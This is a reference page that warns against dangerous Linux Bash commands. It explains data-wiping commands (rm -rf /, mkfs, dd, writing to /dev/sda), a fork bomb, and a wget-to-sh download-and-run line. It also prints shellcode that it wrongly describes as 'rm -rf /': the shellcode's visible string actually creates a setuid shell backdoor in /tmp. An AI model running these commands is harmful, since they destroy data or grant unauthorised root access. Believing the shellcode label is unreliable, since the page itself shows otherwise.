Table of Contents

BASH - Commands - Dangerous Commands

ALERT: These are very dangerous and may cause serious problems to your system.

rm -rf /

rm -rf /

NOTE: The command rm -rf / deletes everything it possibly can, including files on your hard drive and files on connected removable media devices.

This command is more understandable if it’s broken down:

  • rm – Remove the following files.
  • -rf – Run rm recursively (delete all files and folders inside the specified folder) and force-remove all files without prompting you.
  • / – Tells rm to start at the root directory, which contains all the files on your computer and all mounted media devices, including remote file shares and removable drives.

Linux will happily obey this command and delete everything without prompting you, so be careful when using it!

The rm command can also be used in other dangerous ways – rm –rf ~ would delete all files in your home folder, while rm -rf .* would delete all your configuration files.

The Lesson: Beware rm -rf.

Disguised rm –rf /

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

NOTE: This is the hex version of rm –rf /.

Executing this command would wipe out your files just as if you had run rm –rf /.

The Lesson: Don’t run weird-looking, obviously disguised commands that you don’t understand.

:(){ :|: & };:

Fork Bomb. The following line is a simple-looking, but dangerous, bash function: 

:(){ :|: & };:

NOTE: This short line defines a shell function that creates new copies of itself.

The process continually replicates itself, and its copies continually replicate themselves, quickly taking up all your CPU time and memory.

This can cause your computer to freeze.

It’s basically a denial-of-service attack.

The Lesson: Bash functions are powerful, even very short ones.

mkfs.ext4 /dev/sda1

mkfs.ext4 /dev/sda1

NOTE: Formats a Hard Drive. The mkfs.ext4 /dev/sda1 command is simple to understand:

  • mkfs.ext4 – Create a new ext4 file system on the following device.
  • /dev/sda1 – Specifies the first partition on the first hard drive, which is probably in use.

Taken together, this command can be equivalent to running format c: on Windows – it will wipe the files on your first partition and replace them with a new file system.

This command can come in other forms as well – mkfs.ext3 /dev/sdb2 would format the second partition on the second hard drive with the ext3 file system.

The Lesson: Beware running commands directly on hard disk devices that begin with /dev/sd.

command > /dev/sda

any_command > /dev/sda

NOTE: Writes Directly to a Hard Drive.

The command > /dev/sda line works similarly – it runs a command and sends the output of that command directly to your first hard drive, writing the data directly to the hard disk drive and damaging your file system.

  • command – Run a command (can be any command.)
  • > – Send the output of the command to the following location.
  • /dev/sda – Write the output of the command directly to the hard disk device.

The Lesson: As above, beware running commands that involve hard disk devices beginning with /dev/sd.

dd if=/dev/random of=/dev/sda

dd if=/dev/random of=/dev/sda

NOTE: Writes Junk Onto a Hard Drive.

The dd if=/dev/random of=/dev/sda line will also obliterate the data on one of your hard drives.

  • dd – Perform low-level copying from one location to another.
  • if=/dev/random – Use /dev/random (random data) as the input – you may also see locations such as /dev/zero (zeros).
  • of=/dev/sda – Output to the first hard disk, replacing its file system with random garbage data.

The Lesson: dd copies data from one location to another, which can be dangerous if you’re copying directly to a device.

mv ~ /dev/null

mv ~ /dev/null

NOTE: Moves Your Home Directory to a Black Hole.

/dev/null is another special location – moving something to /dev/null is the same thing as destroying it.

Think of /dev/null as a black hole.

Essentially, mv ~ /dev/null sends all your personal files into a black hole.

  • mv – Move the following file or directory to another location.
  • ~ – Represents your entire home folder.
  • /dev/null – Move your home folder to /dev/null, destroying all your files and deleting the original copies.

The Lesson: The ~ character represents your home folder and moving things to /dev/null destroys them.

wget http://example.com/something -O – | sh

wget http://example.com/something -O| sh

NOTE: Downloads and Runs a Script.

The above line downloads a script from the web and sends it to sh, which executes the contents of the script.

This can be dangerous if you’re not sure what the script is or if you don’t trust its source – don’t run untrusted scripts.

  • wget – Downloads a file. (You may also see curl in place of wget.)
  • http://example.com/something – Download the file from this location.
  • | – Pipe (send) the output of the wget command (the file you downloaded) directly to another command.
  • sh – Send the file to the sh command, which executes it if it’s a bash script.

The Lesson: Don’t download and run untrusted scripts from the web, even with a command.

References: